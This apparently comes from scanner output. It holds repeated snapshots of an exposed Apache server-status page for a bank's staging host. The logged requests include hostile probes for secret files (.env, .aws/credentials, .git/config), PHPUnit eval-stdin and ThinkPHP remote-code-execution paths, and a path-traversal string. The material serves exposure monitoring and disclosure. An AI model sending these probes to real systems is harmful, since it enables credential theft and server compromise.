........................._________________________W_____________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-233-0/0/8033. 0.0012512309639600.00.00107.10 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-233-0/0/7926. 0.0012512309429070.00.0089.69 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-233-0/0/7849. 0.0012512319550820.00.0074.77 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7889. 0.0012512319279420.00.0073.66 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7883. 0.0012512309459900.00.0083.82 127.0.0.1http/1.1127.0.1.1:8080GET /version HTTP/1.1 0-233-0/0/7872. 0.00125123010070800.00.0082.09 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 0-233-0/0/7965. 0.0012512319538620.00.0087.07 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7970. 0.0012512309820780.00.00123.74 127.0.0.1http/1.1127.0.1.1:8080GET /.DS_Store HTTP/1.1 0-233-0/0/7956. 0.0012512309656760.00.0091.80 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 0-233-0/0/7914. 0.0012512329943280.00.00106.83 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7927. 0.0012512319393970.00.0074.26 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7952. 0.0012512319473770.00.0090.24 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7871. 0.0012512319281600.00.0078.40 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7879. 0.0012512309752030.00.00101.36 127.0.0.1http/1.1127.0.1.1:8080GET /login.action HTTP/1.1 0-233-0/0/7969. 0.0012512319086030.00.00112.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7807. 0.0012512379374390.00.0083.66 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-233-0/0/7905. 0.0012512319394320.00.0083.30 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7941. 0.0012512349469680.00.00110.54 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7946. 0.0012512309557300.00.0077.07 127.0.0.1http/1.1127.0.1.1:8080GET /info.php HTTP/1.1 0-233-0/0/7968. 0.0012512319298810.00.0090.72 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7872. 0.0012512309404070.00.0091.85 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-233-0/0/7900. 0.0012512309443080.00.00129.35 127.0.0.1http/1.1127.0.1.1:8080GET /config.json HTTP/1.1 0-233-0/0/7989. 0.0012512309694480.00.0078.68 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-233-0/0/7875. 0.0012512309421930.00.0085.87 127.0.0.1http/1.1127.0.1.1:8080GET /s/339313e2432313e29313e2236313/_/;/META-INF/maven/com.atla 0-233-0/0/7866. 0.0012512319897360.00.0096.83 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23517482430/4/10335_ 0.2162907781610.00.0169.58 127.0.0.1http/1.1127.0.1.1:8080GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1-23517482430/6/10304_ 0.2446627833650.00.0171.12 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-23517482430/7/10315_ 0.2647117366910.00.0173.05 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-23517482430/8/10363_ 0.2663417889740.00.0174.09 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23517482430/5/10324_ 0.2184907858290.00.0173.03 127.0.0.1http/1.1127.0.1.1:8080GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-23517482430/5/10361_ 0.2384957623630.00.0071.46 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-23517482430/7/10360_ 0.2685427737680.00.0170.35 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23517482430/4/10268_ 0.21106708931230.00.0079.47 127.0.0.1http/1.1127.0.1.1:8080GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-23517482430/4/10382_ 0.23106717863060.00.0171.20 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23517482430/7/10268_ 0.25107218024530.00.0173.70 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-23517482430/5/10276_ 0.21346607613010.00.0168.69 127.0.0.1http/1.1127.0.1.1:8080GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 1-23517482430/5/10253_ 0.22346617763210.00.0170.46 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 1-23517482430/6/10307_ 0.25347117726450.00.0171.94 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-23517482430/5/10211_ 0.21376607904540.00.0169.54 127.0.0.1http/1.1127.0.1.1:8080GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 1-23517482430/4/10336_ 0.21376608058960.00.0068.54 127.0.0.1http/1.1127.0.1.1:8080GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-23517482430/7/10321_ 0.253771310411740.00.0178.61 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-23517482430/6/10295_ 0.22472607213220.00.0169.97 127.0.0.1http/1.1127.0.1.1:8080GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1 1-23517482430/5/10248_ 0.25472608240300.00.0071.84 127.0.0.1http/1.1127.0.1.1:8080GET 141.76.94.18:443 HTTP/1.1 1-23517482430/5/10274_ 0.25472607959570.00.0173.02 127.0.0.1http/1.1127.0.1.1:8080GET /pscan HTTP/1.1 1-23517482430/6/10212_ 0.21534907702910.00.0172.36 127.0.0.1http/1.1127.0.1.1:8080GET /index.php?s=/index/\\think\\app/invokefunction&function=call 1-23517482430/4/10247_ 0.21534907941570.00.0169.15 127.0.0.1http/1.1127.0.1.1:8080GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-23517482430/5/10359_ 0.2527217889370.00.0168.54 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23517482430/7/10246_ 0.2727208039040.00.0168.92 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23517482430/6/10287_ 0.2362918301560.00.0171.31 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23517482430/5/10274_ 0.214660
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2517b926fab
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Thursday, 31-Jul-2025 04:50:51 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 234 Parent Server MPM Generation: 233 Server uptime: 232 days 11 hours 39 minutes 8 seconds Server load: 0.01 0.07 0.07 Total accesses: 847135 - Total Traffic: 7.5 GB - Total Duration: 103314889 CPU Usage: u588.53 s808.49 cu1061.17 cs375.65 - .0141% CPU load .0422 requests/sec - 403 B/second - 9.3 kB/request - 121.958 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 01447914no0yes1024000 21447913no0yes0025000 Sum200 1049000 _____________________W___.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-23314479140/5/7990_ 0.368609639120.00.01107.02 127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-23314479140/5/7890_ 0.2712809428770.00.0189.64 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-23314479140/6/7816_ 0.3412809550400.00.0174.73 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-23314479140/5/7848_ 0.3613309278850.00.0173.60 127.0.0.1http/1.1127.0.1.1:8080GET /+CSCOE+/logon.html HTTP/1.1 0-23314479140/5/7846_ 0.2718919459540.00.0183.77 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-23314479140/7/7845_ 0.33272110070500.00.0282.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-23314479140/7/7923_ 0.37109538140.00.0286.99 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-23314479140/5/7940_ 0.37109820490.00.01123.70 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-23314479140/6/7916_ 0.37109656360.00.0191.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-23314479140/8/7872_ 0.37009942780.00.02106.77 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-23314479140/7/7892_ 0.3418929393720.00.0174.20 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-23314479140/5/7910_ 0.3619459473390.00.0190.16 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-23314479140/4/7830_ 0.1727219281140.00.0178.33 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-23314479140/6/7835_ 0.37209751500.00.01101.29 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-23314479140/4/7926_ 0.3627719085660.00.01112.39 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-23314479140/5/7773_ 0.37209374100.00.0183.60 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-23314479140/4/7861_ 0.1748919393710.00.0183.23 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-23314479140/6/7903_ 0.37209469270.00.01110.48 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-23314479140/7/7917_ 0.3348959557140.00.0277.03 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-23314479140/6/7924_ 0.3549429298350.00.0190.66 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-23314479140/6/7828_ 0.37419403530.00.0291.78 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233144791410/4/7860W 0.17009442550.00.01129.28 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-23314479140/5/7956_ 0.288119694220.00.0178.64 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-23314479140/6/7848_ 0.37009421740.00.0185.83 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-23314479140/5/7830_ 0.348119897010.00.0296.77 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10296. 0.00200464617781040.00.0069.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10267. 0.00200464617833080.00.0071.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10270. 0.00200464617366290.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10319. 0.00200464627889220.00.0074.01 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10290. 0.00200464617857840.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10317. 0.00200464657622980.00.0071.38 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10313. 0.00200464627737050.00.0070.26 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10224. 0.00200464638921940.00.0079.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10344. 0.00200464617862610.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10222. 0.00200464628023840.00.0073.64 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10235. 0.00200464617612320.00.0068.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10205. 0.00200464617762580.00.0070.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10271. 0.00200464607726070.00.0071.88 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-209-0/0/10166. 0.00200464627895970.00.0069.47 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10295. 0.00200464618058310.00.0068.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10279. 0.002004646110411210.00.0078.54 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10252. 0.00200464657212700.00.0069.90 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10209. 0.00200464628232520.00.0071.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10230. 0.00200464667959070.00.0072.95 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10172. 0.00200464617702370.00.0072.28 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10207. 0.00200464617941110.00.0069.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10314. 0.00200464657888760.00.0068.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10199. 0.00200464618038470.00.0068.84 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10244. 0.00200464618301040.00.0071.23 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10238. 0.00200464607972770.00.0068.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-23314479130/2/8069_ 0.062923611060050.00.0062.00 127.0.0.1http/1.1127.0.1.1:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25142a8e075
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Tuesday, 29-Jul-2025 08:01:35 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 232 Parent Server MPM Generation: 231 Server uptime: 230 days 14 hours 49 minutes 52 seconds Server load: 0.00 0.01 0.00 Total accesses: 845092 - Total Traffic: 7.5 GB - Total Duration: 103302392 CPU Usage: u584.37 s802.11 cu1056.39 cs374.17 - .0141% CPU load .0424 requests/sec - 405 B/second - 9.3 kB/request - 122.238 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 01154987no1yes1024010 21154986no0yes0025000 Sum201 1049010 ___________W_____________.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-23111549870/7/7968_ 0.2163809638390.00.01106.85 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-23111549870/8/7863_ 0.28009422720.00.0189.57 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-23111549870/6/7796_ 0.274319549990.00.0274.67 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-23111549870/5/7827_ 0.28009228890.00.0173.50 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-23111549870/7/7819_ 0.223809459120.00.0283.67 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-23111549870/6/7826_ 0.280010070170.00.0181.98 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-23111549870/9/7899_ 0.2664319537030.00.0286.80 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-23111549870/4/7916_ 0.21106019820060.00.01123.63 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-23111549870/5/7895_ 0.28019655260.00.0191.58 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-23111549870/5/7848_ 0.20106019942370.00.01106.71 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-23111549870/8/7862_ 0.28109393130.00.0174.09 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-231115498711/9/7886W 0.23009472960.00.0290.10 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-23111549870/6/7811_ 0.28109280870.00.0178.26 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-23111549870/9/7806_ 0.26106519751090.00.02101.21 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-23111549870/8/7905_ 0.27209085210.00.02112.33 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-23111549870/4/7751_ 0.223819373780.00.0183.55 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-23111549870/4/7838_ 0.26106509393260.00.0183.13 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 0-23111549870/3/7877_ 0.1563819468910.00.00110.42 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-23111549870/6/7894_ 0.28109552950.00.0176.96 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-23111549870/8/7901_ 0.2150319297960.00.0190.61 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-23111549870/5/7802_ 0.20119519403050.00.0191.72 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-23111549870/7/7835_ 0.2750809442150.00.01129.22 127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-23111549870/4/7933_ 0.2250319693810.00.0178.55 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-23111549870/5/7828_ 0.28209421370.00.0185.77 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-23111549870/6/7807_ 0.27519896600.00.0196.66 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10296. 0.00184329017781040.00.0069.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10267. 0.00184329017833080.00.0071.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10270. 0.00184329017366290.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10319. 0.00184329027889220.00.0074.01 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10290. 0.00184329017857840.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10317. 0.00184329057622980.00.0071.38 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10313. 0.00184329027737050.00.0070.26 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10224. 0.00184329038921940.00.0079.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10344. 0.00184329017862610.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10222. 0.00184329028023840.00.0073.64 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10235. 0.00184329017612320.00.0068.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10205. 0.00184329017762580.00.0070.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10271. 0.00184329007726070.00.0071.88 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-209-0/0/10166. 0.00184329027895970.00.0069.47 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10295. 0.00184329018058310.00.0068.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10279. 0.001843290110411210.00.0078.54 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10252. 0.00184329057212700.00.0069.90 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10209. 0.00184329028232520.00.0071.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10230. 0.00184329067959070.00.0072.95 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10172. 0.00184329017702370.00.0072.28 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10207. 0.00184329017941110.00.0069.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10314. 0.00184329057888760.00.0068.47 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10199. 0.00184329018038470.00.0068.84 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10244. 0.00184329018301040.00.0071.23 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10238. 0.00184329007972770.00.0068.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-23111549860/10/8011_ 0.64938011047340.00.0361.85 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-23111549860/10
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25175adad52
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Saturday, 26-Jul-2025 22:07:27 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 229 Parent Server MPM Generation: 228 Server uptime: 228 days 4 hours 55 minutes 44 seconds Server load: 0.00 0.00 0.00 Total accesses: 841473 - Total Traffic: 7.5 GB - Total Duration: 103276475 CPU Usage: u580.02 s794.07 cu1048.87 cs371.53 - .0142% CPU load .0427 requests/sec - 409 B/second - 9.4 kB/request - 122.733 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 0709701no0yes1024000 2709700no0yes0025000 Sum200 1049000 ______W__________________.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2287097010/43/7880_ 2.20009623430.00.07106.47 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-2287097010/49/7798_ 2.20009421660.00.0689.36 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-2287097010/57/7731_ 2.20009548930.00.0974.41 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-2287097010/45/7763_ 2.20009228130.00.0873.35 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-2287097010/52/7748_ 2.20009452240.00.0783.50 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-2287097010/51/7730_ 2.200010035540.00.0881.75 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-22870970110/45/7807W 2.06009507140.00.0786.55 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-2287097010/49/7839_ 2.1899609818070.00.07123.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-2287097010/53/7826_ 2.1299119654080.00.0891.28 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-2287097010/42/7779_ 2.1599129941470.00.07106.55 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-2287097010/47/7788_ 2.1995329382820.00.0773.84 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-2287097010/50/7802_ 2.1694829465950.00.0889.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-2287097010/44/7736_ 2.1294819269010.00.0777.82 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-2287097010/54/7728_ 2.205419743500.00.08101.04 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-2287097010/47/7826_ 2.144919084040.00.08112.15 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-2287097010/44/7683_ 2.174919372770.00.0783.34 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-2287097010/46/7775_ 2.1434829392320.00.0682.91 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-2287097010/49/7808_ 2.1734819460420.00.07110.24 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-2287097010/43/7826_ 2.1935369552190.00.0776.79 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-2287097010/44/7825_ 2.20019292070.00.0690.40 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-2287097010/44/7723_ 2.1239119392580.00.0691.52 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-2287097010/49/7762_ 2.20009441170.00.07129.04 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-2287097010/48/7859_ 2.1739169692630.00.0778.33 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-2287097010/47/7752_ 2.20009413270.00.0785.48 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-2287097010/46/7730_ 2.1939619885740.00.0896.44 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10296. 0.00163484217781040.00.0069.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10267. 0.00163484217833080.00.0071.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10270. 0.00163484217366290.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10319. 0.00163484227889220.00.0074.01 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10290. 0.00163484217857840.00.0072.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10317. 0.00163484257622980.00.0071.38 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10313. 0.00163484227737050.00.0070.26 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10224. 0.00163484238921940.00.0079.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10344. 0.00163484217862610.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10222. 0.00163484228023840.00.0073.64 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-209-0/0/10235. 0.00163484217612320.00.0068.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10205. 0.00163484217762580.00.0070.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-209-0/0/10271. 0.00163484207726070.00.0071.88 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-209-0/0/10166. 0.00163484227895970.00.0069.47 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 